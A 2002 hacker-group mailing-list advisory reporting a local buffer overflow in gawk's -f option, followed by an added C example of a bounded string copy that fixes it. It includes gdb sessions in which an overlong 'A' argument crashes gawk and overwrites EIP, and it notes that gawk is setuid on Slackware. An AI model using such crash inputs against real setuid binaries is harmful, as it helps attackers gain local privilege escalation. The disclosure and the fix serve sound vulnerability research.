From: es at hush.com (es@...h.com)
Subject: [ElectronicSouls] - Gawk Overflow

-----BEGIN PGP SIGNED MESSAGE-----

Dear List,

We have extensively researched this problem in Gawk, and now have
deemed it to be a security hole.  Details follow.

# cat ESgawk.txt
 <-----]research!!![----->
Electronic Souls > Security Bug @!%^#%!^&#%@!(*#$@)($)*@(&$@(*$&@@$^&$#@

vux[ES] & gnome_ present:  /bin/gawk, /usr/bin/gawk local buffer overflow !!
I have information (from gnome_) that the gawk program is suid on Slackware Linux.

--> RedHat Linux 6.2 testing:
[pom@...t pom]$ gdb /bin/gawk core
GNU gdb 4.17.0.11 with Linux support
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(no debugging symbols found)...
Core was generated by `gawk -f AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAA'.
Program terminated with signal 6, Aborted.
Reading symbols from /lib/libm.so.6...done.
Reading symbols from /lib/libc.so.6...done.
Reading symbols from /lib/ld-linux.so.2...done.
#0  0x40054d21 in __kill ()
(gdb) i r
     eax:        0x0           0
     ecx:        0x6           6
     edx: 0x401261cc  1074946508
     ebx:      0xa23        2595
     esp: 0xbfffae9c -1073762660
     ebp: 0xbfffaeac -1073762644
     esi: 0xbfffb0f3 -1073762061
     edi: 0xbfffaec4 -1073762620
     eip: 0x40054d21  1074089249
  eflags:      0x207 IOPL: 0; flags: CF PF IF
orig_eax:       0x25          37
      cs:       0x23          35
      ss:       0x2b          43
      ds:       0x2b          43
      es:       0x2b          43
      fs:       0x2b          43
      gs:       0x2b          43
(gdb)

(gdb) r -f `perl -e'print "A"x8543'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /bin/gawk -f `perl -e'print "A"x8543'`


Program received signal SIGSEGV, Segmentation fault.
strcpy (dest=0xbfffb123 'A' <repeats 200 times>...,
    src=0x41414141 <Address 0x41414141 out of bounds>)
    at ../sysdeps/generic/strcpy.c:37
./sysdeps/generic/strcpy.c:37: No such file or directory.
(gdb)i r
     eax: 0x7ebe6fe2  2126409698
     ecx: 0x7ebe6fe1  2126409697
     edx: 0x41414141  1094795585
     ebx: 0xbfffb123 -1073762013
     esp: 0xbfffb0f4 -1073762060
     ebp: 0xbfffb0f8 -1073762056
     esi: 0xbfffb123 -1073762013
     edi: 0xbfffb114 -1073762028
     eip: 0x400947a1  1074349985
  eflags:    0x10a06 IOPL: 0; flags: PF IF OF RF
orig_eax: 0xffffffff          -1
      cs:       0x23          35
      ss:       0x2b          43
      ds:       0x2b          43
      es:       0x2b          43
      fs:        0x0           0
      gs:        0x0           0

--> PhatLinux testing:
(gdb)
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for details.
This GDB was configured as "i386-mandrake-linux"...
(no debugging symbols found)...
(gdb) r -f `perl -e'print "A"x8543'`
Starting program: /bin/gawk -f `perl -e'print "A"x8543'`

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax            0xffffffff       -1
ecx            0x24     36
edx            0x24     36
ebx            0xfffffffa       -6
esp            0xbfffd174       0xbfffd174
ebp            0x0      0x0
esi            0x0      0
edi            0x0      0
eip            0x41414141       0x41414141
eflags         0x10282  66178
cs             0x23     35
ss             0x2b     43
ds             0x2b     43
es             0x2b     43
fs             0x0      0
gs             0x0      0
(gdb)

h4h4 - (c) 2002 vux //fEAr!

greetz to: gnome_, Brain Storm[ES] & ES-team.
fuckz to : Nia*[ES], CraigTM[ES].

#

Be sure to patch immediately.

The Electronic Souls Crew
[ElectronicSouls] (c) 2002

"People get drunk drinking alcohol."

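The backtraces above stop in strcpy() with src already overwritten by the 'A' bytes, which is the signature of an unchecked copy of the -f argument into a fixed-size buffer. The following is an added example of the bounded copy that prevents that, written for this post and not taken from gawk's source; the 4096-byte buffer size, the function names and the usage in main() are assumptions, and the 8543-byte test input mirrors the length used in the advisory.

```c
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define SCRIPT_PATH_MAX 4096   /* assumed size of the fixed destination buffer */

/* Bounded replacement for strcpy(dst, src): copies only if src (with its NUL)
 * fits in dst. Returns 0 on success, -1 if it does not fit; dst is untouched
 * on failure, so an overlong -f argument is rejected instead of smashing it. */
int copy_script_path(char *dst, size_t dst_size, const char *src)
{
    const char *end = memchr(src, '\0', dst_size); /* scan at most dst_size bytes */
    if (end == NULL)
        return -1;
    memcpy(dst, src, (size_t)(end - src) + 1);
    return 0;
}

/* Builds a constructed argument of len 'A' bytes (the advisory used 8543)
 * and returns what the bounded copy does with it: 0 = accepted, -1 = rejected. */
int try_script_path_of_length(size_t len)
{
    char dst[SCRIPT_PATH_MAX];
    char *src = malloc(len + 1);
    int rc;
    if (src == NULL)
        return -2;
    memset(src, 'A', len);
    src[len] = '\0';
    rc = copy_script_path(dst, sizeof dst, src);
    free(src);
    return rc;
}

int main(int argc, char **argv)
{
    char script_path[SCRIPT_PATH_MAX];
    if (argc < 3 || strcmp(argv[1], "-f") != 0) {
        fprintf(stderr, "usage: %s -f <script>\n", argv[0]);
        return 2;
    }
    if (copy_script_path(script_path, sizeof script_path, argv[2]) != 0) {
        fprintf(stderr, "script path too long (limit %d), refusing\n",
                SCRIPT_PATH_MAX - 1);
        return 2;
    }
    printf("would open script: %s\n", script_path);
    return 0;
}
```

The same length check belongs wherever an argument or environment string is copied into a fixed buffer; on a setuid binary that is the difference between a clean error and the 0x41414141 instruction pointer shown in the PhatLinux trace.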